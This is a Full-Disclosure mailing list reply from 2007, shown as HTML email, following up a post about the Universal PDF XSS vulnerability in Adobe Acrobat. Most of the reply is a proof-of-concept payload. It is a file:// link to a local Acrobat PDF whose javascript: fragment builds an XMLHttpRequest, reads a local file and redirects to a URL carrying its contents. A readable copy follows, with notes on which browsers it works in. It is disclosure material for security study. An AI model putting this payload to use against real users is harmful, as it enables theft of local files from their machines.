<a href="file:///C:/Program">file:///C:/Program</a> Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('
Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(xhr.responseText);window.location = "<a href="http://localhost:80/whatever.htm?content=">
http://localhost:80/whatever.htm?content=</a>" + xhr.responseText;}};xhr.open('GET', '<a href="file:///C:/Program">file:///C:/Program</a> Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null); <- sends a local file to a remote location.
<br><br>Readable:<br>function cXHR(){ //Grabs a legit XHR.<br> try{<br> return new ActiveXObject('Msxml2.XMLHTTP');<br> }catch(e){}<br> try{<br> return new ActiveXObject('Microsoft.XMLHTTP
');<br> }catch(e){}<br> try{<br> return new XMLHttpRequest();<br> }catch(e){} <br> return null;<br>}<br>var xhr = cXHR(); //For grabbing<br>xhr.onreadystatechange = function(){<br> if (xhr.readyState
== 4){<br> alert(xhr.responseText);<br> window.location = "<a href="http://localhost:80/whatever.htm?content=">http://localhost:80/whatever.htm?content=</a>" + xhr.responseText;<br> }<br>};<br>
xhr.open('GET', '<a href="file:///C:/Program">file:///C:/Program</a> Files/Adobe/Acrobat 6.0/ReadMe.htm', true);<br>xhr.send(null);<br><br>Works in FFOX / Opera, not in IE.<br><br><div><span class="gmail_quote">
On 1/4/07, <b class="gmail_sendername">pdp (architect)</b> <<a href="mailto:pdp.gnucitizen@googlemail.com">pdp.gnucitizen@googlemail.com</a>> wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
Everybody knows about it. Everybody talks about it. We had a nice<br>party. It is time for estimating the damages. In this article I will<br>try to show the impact of the Universal PDF XSS vulnerability by<br>explaining how it can be used in real life situations.
<br><br><a href="http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/">http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/</a><br><br>--<br>pdp (architect) | petko d. petkov<br><a href="http://www.gnucitizen.org">
http://www.gnucitizen.org</a><br><br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html">http://lists.grok.org.uk/full-disclosure-charter.html
</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/">http://secunia.com/</a><br></blockquote></div><br>